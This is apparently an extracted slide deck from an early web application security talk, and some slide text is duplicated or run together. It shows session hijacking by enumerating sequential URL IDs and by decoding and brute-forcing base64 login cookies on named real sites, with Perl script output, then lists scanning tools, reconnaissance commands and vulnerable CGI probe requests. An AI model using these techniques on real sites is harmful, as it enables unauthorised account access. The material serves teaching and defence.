URL Example – Sendomatic.comURL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
URL Example – Sendomatic.comURL Example – Sendomatic.comView other people’s events. Crash a party, edit an event, cancel and event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
Cookie Example – Freeservers.comCookie Example – Freeservers.com
Cookie Example – Freeservers.comCookie Example – Freeservers.com
•LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
• Base 64 decode the string: http://www.securitystats.com/tools/base64.asp
testing123.itgo.com:1231234 username:password
• Next, automate it with a perl exploit by feeding encoded strings in to the cookie
Cookie Example – Freeservers.comCookie Example – Freeservers.com
%perl freeservershack.pltrying testtrying test123trying 123123trying 1231234 Cracked it! The password to testing123.itgo.com is 1231234
GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3DCookie2: $Version=1 %
Cookie Example – Cookie Example – Freeservers.comFreeservers.com
• Or a much longer way: use the brute forcer on every single cookie character combination
Cookie/URL Example – Cookie/URL Example – Amazon.comAmazon.com
• Some sites use the URL AND Cookie for authentication:
6 Common Problems6 Common Problems
• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.
• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.
6 Common Problems – Continued6 Common Problems – Continued
• Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.
• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.
• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
ToolsTools
• Sessions Auditorwww.idefense.com/idtools/Session_Auditor.zip
• Visual Testing – WebSleuthwww.geocities.com/dzzie/sleuth
• WebProxy -www.atstake.com/research/tools/index.html
• HTTPush - httpush.sourceforge.net
• Achilles - www.digizen-security.com/downloads.html
• MiniBrowser - aignes.com/download.htm
• Some good things:– Completeness– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands of anyone who calls themselves a “Information Security Expert”.
Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well
Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well
•Every programmer does things a little different
•Authentication schemes are hard to automate
•Error codes are not standardized•Sometimes simple things like SSL get in the
way
Why People are BetterWhy People are Better
•Recognition of subtle errors•We understand the impact and therefore
the risk of a vulnerability•We are grounded in the fundamentals of
Computer Science and therefore are able to find “real” bugs, flaws in logic
Web Hacking AccessoriesWeb Hacking Accessories
• Some helpful tools include….– A port scanner (Nmap et. al.)
www.insecure.org/nmap/
– Netcat; the network swiss army knife http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner; Whisker http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– Open SSL source and documentation• OpenSSL, RFC 2246
New tools on the New tools on the horizon…horizon…
New tools on the New tools on the horizon…horizon…
• Nikto– CGI scanner, similar to whisker 1.4. Checks for CGIs,
common dirs, and old versions Database frequently updated http://www.cirt.net/
• WHArsenal– Set of CGIs that plug into an existing Apache install. Allows
for all kinds of requests, while controling/modifying request particulars. http://community.whitehatsec.com/
• @stake WebProxy– Assessment proxy with full fuzzer/rewriting capabilities.
Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/
• Nessus– Has a few new interesting web assessment plugins which
do site crawling/mirroring and a few other interesting things. http://www.nessus.org/
Basic Training for Web Basic Training for Web Combat…Combat…
• Port scanning– Look for well-known TCP web ports.
• 80, 81, 443, 8000, 8080, etc…
• Using FScan (from Foundstone)fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor)nmap -p 80,81,443,8000,8080 10.0.0.1
Basic Training for Web Basic Training for Web Combat…Combat…
• Fingerprinting – HTTP Banner grabbing.– netcat as a TCP client (even telnet works)
nc 10.0.0.1 80
HEAD / HTTP/1.0
• Advanced HTTP methods:– TRACE, OPTIONS, etc.
Basic Training for Web Basic Training for Web Combat…Combat…
Shaking the tree for the low hanging fruit….
• Scan using a database of known web vulnerabilities.
• Whisker (by Rain Forest Puppy)./whisker.pl -h 10.0.0.1 -I 1
• cgichk.c<snip>"GET /cgi-bin/phf HTTP/1.0\n\n";"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";"GET /cgi-bin/test-cgi HTTP/1.0\n\n";"GET /cgi-bin/php.cgi HTTP/1.0\n\n
• ISS, Cybercop, Retina, etc.
el33t hax0r Training for el33t hax0r Training for Web Combat…Web Combat…
What about SSL?
• Some SSL Myths:– “We are secure because we use SSL!”– “Strong 128 bit crypto being used”– “We use Digital Certificates signed by
VeriSign”
Proxy Over SSLProxy Over SSL• Using netcat and OpenSSL, it is possible
to create a simple two-line SSL Proxy!• Listen on port 80 on a host and redirect
requests to port 443 on a remote host through SSL.
SSLweb
server
Webclient
openssl
nc
Assessment ToolsAssessment Tools
• Vulnerability scanners– Look for a known list of vulnerable
applications or technologies– Do not (can not) engage/scan custom
applications and configurations– General vulnerability scanners: ISS,
Cybercop, Nessus– Web-specific vulnerability scanners:
WebInspect, whisker
Assessment toolsAssessment tools
• ‘Proxy monitors’– HTTP proxy which monitors traffic, looking
for web vulnerabilities as they pass– Can analyze custom applications with the
help of a user– Examples: AppScan, RFProxy,
HTTPush, Achilles
Root Causes of Web Root Causes of Web HacksHacks
• Complex web architectures may cause oversight in web server configuration.
• URL Parsing.• File Canonicalization.• Combination of underlying operating
system and web server may leave holes.
Root Causes of Web Root Causes of Web HacksHacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.• Security vs. time-to-market.• Zero knowledge administration breeds
zero knowledge administrators.